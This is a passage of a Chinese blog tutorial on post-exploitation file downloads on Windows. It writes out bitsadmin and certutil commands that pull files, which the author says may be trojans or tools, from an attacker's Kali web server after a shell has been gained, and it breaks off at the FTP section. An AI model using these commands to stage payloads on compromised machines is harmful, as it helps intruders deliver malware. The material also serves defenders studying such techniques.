windows ftp命令_后渗透系列——下载(Windows篇)

本文详细介绍了多种在Windows环境下进行后渗透阶段下载文件的方法,包括Bitsadmin、Certutil、FTP、HH.exe、Excel.exe、WSL.exe、MSIEXEC.exe、IPC$以及VBS脚本等。这些工具和命令可用于从远程服务器下载木马、工具或其他任意文件到本地磁盘。
摘要由CSDN通过智能技术生成

后渗透系列——下载文件(Windows篇)

后渗透是指已对目标服务器有shell交互后的操作,通常包含权限维持、提权、内网渗透、一键拿域控。

本篇文章主要讲解后渗透准备工作——下载文件的方式,文件可以是木马、工具等等(任意文件皆可),为了方便演示,文件为test.txt。

1.准备工作

首先需要架设服务器,并把要下载的文件部署在服务器上,笔者用的服务器为Kali Linux架设,ip地址是192.168.1.103。

输入命令:service apache2 start  //启动Apache

输入命令:vim /var/www/html/test/test.txt //创建文件(可以是木马、工具等任意文件)

5fa34bd8ecd2c265a040d98fff66a4b2.png

服务器端架设完成,准备工作就到这里,下文开始演示Windows除网页下载文件的一些方法。

2.下载文件

(1)Bitsadmin

     此命令只能下载文件到本地磁盘上。

     使用方法:

     第一种

     bitsadmin /transfer myjob1 /download /priority normal http://192.168.1.103/test/test.txt C:\Users\snowwolf\Desktop\test.txt

c10a8674d890ddb2484c1455f2efa5e6.png

     第二种

     bitsadmin /rawreturn /transfer getfile http://192.168.1.103/test/test.txt C:\Users\snowwolf\Desktop\test.txt

3add78b0fc9b12364de226f147a6fcd1.png

     第三种

     bitsadmin /rawreturn /transfer getpayload http://192.168.1.103/test/test.txt C:\Users\snowwolf\Desktop\test.txt

f8ac07d577c9de43d0a2df4e29ef5dc6.png

     第四种

     bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.103/test/test.txt" "C:\Users\snowwolf\Desktop\test.txt"

支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10

(2)Certutil

     Windows程序用于处理证书

     使用方法:

     certutil.exe -urlcache -split -f http://192.168.1.103/test/test.exe test.exe

     会将exe文件下载到当前目录

99b7514d5b6715c6471a9018ee30b202.png

 支持的系统版本:Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10

(3)FTP

     文件传输协议,Windows可以直接搭建FTP服务器,所以这里ip地址是Windows的ip

     使用方法:

     第一种方式——交互式下载

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值